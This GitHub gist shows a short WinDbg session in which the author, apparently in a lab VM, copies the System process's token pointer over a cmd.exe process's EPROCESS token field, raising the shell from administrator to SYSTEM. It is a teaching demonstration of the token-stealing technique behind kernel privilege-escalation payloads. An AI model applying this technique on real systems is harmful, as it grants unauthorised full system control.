Created
August 21, 2019 20:01
-
-
Save poxyran/cbadaa54633f068f9b82f91b1358c9e5 to your computer and use it in GitHub Desktop.
Overwriting process token using Windbg
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| On Guest VM: | |
| C:\Users\Administrator>whoami | |
| win-2v2jfp9h9ts\administrator | |
| On Windbg (Host VM): | |
| dt nt!_EPROCESS | |
| +0x358 Token : _EX_FAST_REF | |
| // Get the list of procs and the EPROCESS address of each one | |
| 7: kd> !dml_proc | |
| Address PID Image file name | |
| ffff840d`e406c300 4 System | |
| .. | |
| ffffc68d`9aa3c080 1188 cmd.exe | |
| // Get the token addr from 'System' | |
| 7: kd> dq ffff840d`e406c300+358 L1 | |
| ffff840d`e406c658 ffffd309`aa80617e | |
| // Mask off the 4 lowest bits of the value | |
| 7: kd> ? ffffd309`aa80617e & ffffffff`fffffff0 | |
| 7: kd> !token ffffd309`aa806170 | |
| The address ffffd309aa806170 does not point to a token object. | |
| // Overwrite token in the target process | |
| 7: kd> eq ffffc68d`9aa3c080+358 ffffd309aa806170 | |
| On Guest VM: | |
| C:\Users\Administrator>whoami | |
| nt authority\system |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment